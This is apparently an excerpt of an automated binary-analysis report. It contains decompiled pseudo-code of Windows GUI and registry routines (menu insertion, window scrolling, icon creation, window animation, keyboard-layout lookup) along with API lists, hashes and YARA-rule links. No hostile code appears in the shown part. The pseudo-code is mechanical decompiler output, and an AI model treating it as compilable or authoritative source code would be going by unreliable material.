                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B380
                                                                                • String ID:
                                                                                • API String ID: 120756276-0
                                                                                • Opcode ID: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction ID: 88d4aa4338388887b010d1d2673664308c814e5b90057e50378935041044e061
                                                                                • Opcode Fuzzy Hash: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction Fuzzy Hash: D12158F1B40328AADB10DB99CD85F9E73BCDB48704F5104A6F705F61C1D678AE509B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00445468, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E00445468(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x4456c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x4456ca);
					E00404320( &_v68);
					return E00404320( &_v12);
				}
				E004043B8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E004472A4(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x46baa0 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0046BA94 |  *0x0046BA84 |  *0x0046BA8C | 0x00000400;
							_t103 = E004472A4(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047D0(_v12));
							} else {
								_t109 = E004047D0( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044596C(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00447860(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00446E7C(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x46bad4 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0046BACC |  *0x0046BAA8 |  *0x0046BADC |  *0x0046BAE4;
							_v61.fState =  *0x0046BAB4 |  *0x0046BAC4 |  *0x0046BABC;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047D0(_v12);
							if(E004472A4(_t154) > 0) {
								_v61.hSubMenu = E0044596C(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x4456dc);
						E00444ACC( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404698();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x44435c; // 0x4443a8
					_t149 = E00403740( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044596C(_t154);
				goto L8;
			}





















                                                                                0x00445468
                                                                                0x00445473
                                                                                0x00445476
                                                                                0x00445479
                                                                                0x0044547c
                                                                                0x0044547e
                                                                                0x00445482
                                                                                0x00445483
                                                                                0x00445488
                                                                                0x0044548b
                                                                                0x00445492
                                                                                0x004456a5
                                                                                0x004456a7
                                                                                0x004456aa
                                                                                0x004456ad
                                                                                0x004456b5
                                                                                0x004456c2
                                                                                0x004456c2
                                                                                0x0044549e
                                                                                0x004454ac
                                                                                0x004454ba
                                                                                0x004454bf
                                                                                0x00445504
                                                                                0x00445512
                                                                                0x0044565e
                                                                                0x00445666
                                                                                0x0044566b
                                                                                0x0044566d
                                                                                0x004456a0
                                                                                0x0044566f
                                                                                0x00445672
                                                                                0x00445687
                                                                                0x00445687
                                                                                0x00000000
                                                                                0x0044566d
                                                                                0x00445518
                                                                                0x0044551f
                                                                                0x0044552d
                                                                                0x00445531
                                                                                0x00445548
                                                                                0x00445556
                                                                                0x00445556
                                                                                0x00000000
                                                                                0x00445556
                                                                                0x00445552
                                                                                0x00445554
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044555a
                                                                                0x0044555a
                                                                                0x0044555a
                                                                                0x0044555c
                                                                                0x0044555c
                                                                                0x004455ab
                                                                                0x004455d2
                                                                                0x004455d9
                                                                                0x004455de
                                                                                0x004455e3
                                                                                0x004455e8
                                                                                0x004455f3
                                                                                0x004455ff
                                                                                0x00445608
                                                                                0x00445608
                                                                                0x00445614
                                                                                0x00000000
                                                                                0x00445614
                                                                                0x00445531
                                                                                0x004454c1
                                                                                0x004454c4
                                                                                0x004454c6
                                                                                0x004454e0
                                                                                0x004454e0
                                                                                0x004454e3
                                                                                0x004454ef
                                                                                0x004454f4
                                                                                0x004454ff
                                                                                0x00000000
                                                                                0x004454ff
                                                                                0x004454c8
                                                                                0x004454cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004454d1
                                                                                0x004454d7
                                                                                0x004454dc
                                                                                0x004454de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004454de
                                                                                0x004454b5
                                                                                0x00000000

                                                                                APIs
                                                                                • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00445614
                                                                                • GetVersion.KERNEL32(00000000,004456C3), ref: 00445504
                                                                                  • Part of subcall function 0044596C: CreatePopupMenu.USER32(?,0044567F,00000000,00000000,004456C3), ref: 00445987
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$CreateInsertItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 133695497-2308483597
                                                                                • Opcode ID: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction ID: 3d737bce33b9b63eca678c529a0aeb9621d3b228851bcedd8045e0118eaffb15
                                                                                • Opcode Fuzzy Hash: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction Fuzzy Hash: 7A611270A006449BEF10EFB9D88166E7BF6AF49304F45407AE944E7397E738D845C748
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045E014, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E0045E014(void* __eax, int __ecx, signed int __edx, char _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t112;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t2 =  &_a4; // 0x45e1e1
				_t142 =  *_t2;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(__eflags != 0) {
						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x34)));
						ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						__eflags = 0;
						E00412984(0,  *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
						ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
						_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						E00412984(0,  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
						_t90 = ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037B0(_t125, _t147) != 0) {
						_push( *((intOrPtr*)(_t142 + 0x3c)));
						_push( &_v28);
						_push(E004350A4(_t125) -  *((intOrPtr*)(_t142 + 4)));
						_t112 = E004350A4(_t125);
						__eflags = 0;
						_pop(_t131);
						E00412984(_t112 -  *((intOrPtr*)(_t142 + 0xc)), _t131, 0);
						_v8 =  ~_v8;
					} else {
						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
					}
					_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E0045F820(_t125,  &_v44);
					return E0045D710(_t125,  &_v44, _t149);
				}
			}













                                                                                0x0045e01d
                                                                                0x0045e01f
                                                                                0x0045e022
                                                                                0x0045e024
                                                                                0x0045e024
                                                                                0x0045e027
                                                                                0x0045e035
                                                                                0x0045e037
                                                                                0x0045e037
                                                                                0x0045e03b
                                                                                0x0045e03d
                                                                                0x0045e0b5
                                                                                0x0045e0b9
                                                                                0x0045e105
                                                                                0x0045e128
                                                                                0x0045e13b
                                                                                0x0045e13d
                                                                                0x0045e15d
                                                                                0x0045e173
                                                                                0x0045e195
                                                                                0x0045e0bb
                                                                                0x0045e0cb
                                                                                0x0045e0eb
                                                                                0x0045e0eb
                                                                                0x0045e03f
                                                                                0x0045e04c
                                                                                0x0045e068
                                                                                0x0045e06c
                                                                                0x0045e077
                                                                                0x0045e07a
                                                                                0x0045e082
                                                                                0x0045e084
                                                                                0x0045e085
                                                                                0x0045e08a
                                                                                0x0045e04e
                                                                                0x0045e05e
                                                                                0x0045e05e
                                                                                0x0045e0ab
                                                                                0x0045e0ab
                                                                                0x0045e19a
                                                                                0x0045e1a1
                                                                                0x0045e1bd
                                                                                0x0045e1a3
                                                                                0x0045e1a8
                                                                                0x00000000
                                                                                0x0045e1b2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ScrollWindow
                                                                                • String ID: E
                                                                                • API String ID: 2126015319-2089609516
                                                                                • Opcode ID: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction ID: 59567550c3053fb61c417f11c068a5971746d9c38f0f71f24a54f4a7561ce20a
                                                                                • Opcode Fuzzy Hash: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction Fuzzy Hash: 3D510071A00509BBDB04DA99CD82FEFB7ACEF48304F405126BA05E7681CB78E955CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420CEC, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E00420CEC() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E00420B6C( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E00408330(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x420ed3, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E004209A4( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E00408330( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x420eb0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x487714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420114(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E00420EB7);
				return E0040274C( *(_t198 - 0x30));
			}













                                                                                0x00420cee
                                                                                0x00420cfd
                                                                                0x00420d03
                                                                                0x00420d06
                                                                                0x00420d08
                                                                                0x00420d0d
                                                                                0x00420d1e
                                                                                0x00420d23
                                                                                0x00420d4a
                                                                                0x00420d4d
                                                                                0x00420d4d
                                                                                0x00420d50
                                                                                0x00420d51
                                                                                0x00420d51
                                                                                0x00420d51
                                                                                0x00420d0d
                                                                                0x00420d5f
                                                                                0x00420d6b
                                                                                0x00420d77
                                                                                0x00420d85
                                                                                0x00420d93
                                                                                0x00420dad
                                                                                0x00420dc0
                                                                                0x00420dcf
                                                                                0x00420dde
                                                                                0x00420ded
                                                                                0x00420dfd
                                                                                0x00420e0c
                                                                                0x00420e14
                                                                                0x00420e1f
                                                                                0x00420e24
                                                                                0x00420e25
                                                                                0x00420e2a
                                                                                0x00420e2d
                                                                                0x00420e30
                                                                                0x00420e36
                                                                                0x00420e3e
                                                                                0x00420e4c
                                                                                0x00420e55
                                                                                0x00420e5e
                                                                                0x00420e7a
                                                                                0x00420e88
                                                                                0x00420e90
                                                                                0x00420e92
                                                                                0x00420e92
                                                                                0x00420e99
                                                                                0x00420e9c
                                                                                0x00420e9f
                                                                                0x00420eaf

                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DDE
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DED
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E3E
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E4C
                                                                                • DeleteObject.GDI32(?), ref: 00420E55
                                                                                • DeleteObject.GDI32(?), ref: 00420E5E
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420E80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction ID: d2be98027a47b0f60a69fa7761058e0b512e7efa375e76c795a88d23bc60e875
                                                                                • Opcode Fuzzy Hash: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction Fuzzy Hash: F1610671A00218AFCB00DFA9D881AAEBBF9FF49304B514466F804FB352D739AD51CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043D260, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E0043D260(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x486dac; // 0x487c00
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x43d427);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E004356D0(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E004368EC(_v8,  &_v28);
				if(E004531E8() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E004531E8() -  *(_v8 + 0x4c);
				}
				if(E004531F4() <  *(_v8 + 0x48) + _v28) {
					_v28 = E004531F4() -  *(_v8 + 0x48);
				}
				if(E004531DC() > _v28) {
					_v28 = E004531DC();
				}
				if(E004531D0() > _v16) {
					_v16 = E004531D0();
				}
				SetWindowPos(E0043BD14(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004045D8(_t113) < 0x64 &&  *0x46b8cc != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E004404B4( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x46b8cc(E0043BD14(_v8), 0x64,  *0x0046B9D4 | 0x00040000);
					}
				}
				ShowWindow(E0043BD14(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x43d42e);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}















                                                                                0x0043d26e
                                                                                0x0043d26f
                                                                                0x0043d270
                                                                                0x0043d271
                                                                                0x0043d272
                                                                                0x0043d274
                                                                                0x0043d277
                                                                                0x0043d280
                                                                                0x0043d289
                                                                                0x0043d28a
                                                                                0x0043d28f
                                                                                0x0043d292
                                                                                0x0043d29a
                                                                                0x0043d29f
                                                                                0x0043d2a9
                                                                                0x0043d2c0
                                                                                0x0043d2cf
                                                                                0x0043d2cf
                                                                                0x0043d2e4
                                                                                0x0043d2f3
                                                                                0x0043d2f3
                                                                                0x0043d300
                                                                                0x0043d309
                                                                                0x0043d309
                                                                                0x0043d316
                                                                                0x0043d31f
                                                                                0x0043d31f
                                                                                0x0043d345
                                                                                0x0043d35d
                                                                                0x0043d385
                                                                                0x0043d38e
                                                                                0x0043d39d
                                                                                0x0043d3a6
                                                                                0x0043d3b4
                                                                                0x0043d3bf
                                                                                0x0043d3bf
                                                                                0x0043d3bf
                                                                                0x0043d3e3
                                                                                0x0043d3e3
                                                                                0x0043d38e
                                                                                0x0043d3f4
                                                                                0x0043d3fe
                                                                                0x0043d403
                                                                                0x0043d406
                                                                                0x0043d409
                                                                                0x0043d416
                                                                                0x0043d41c
                                                                                0x0043d41f
                                                                                0x0043d426

                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D345
                                                                                • GetTickCount.KERNEL32 ref: 0043D34A
                                                                                • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D385
                                                                                • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D39D
                                                                                • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043D3E3
                                                                                • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D427), ref: 0043D3F4
                                                                                • GetTickCount.KERNEL32 ref: 0043D40E
                                                                                  • Part of subcall function 004404B4: GetCursorPos.USER32(?), ref: 004404B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                • String ID:
                                                                                • API String ID: 3024527889-0
                                                                                • Opcode ID: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction ID: 893ef75b31aebc2a37a936a1955b57e4fbaaa27f92c468afc2ea37a70f40a7ca
                                                                                • Opcode Fuzzy Hash: ceb493bec2d905fdef923c3c531a51f5c382aecc693b1b4a997a9dade46dbdfe
                                                                                • Instruction Fuzzy Hash: BB517574A00109EFDB10DFA9C982A9EB7F4EF49304F204466F940E7391D779AE40CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453434, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00453434(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x4535df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x4535e6);
					return E00404320( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403584(1);
					E00404320(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00415F54( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00440924( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00409220( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x45359b);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404588( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404588(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4535a2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}




















                                                                                0x00453435
                                                                                0x00453437
                                                                                0x00453440
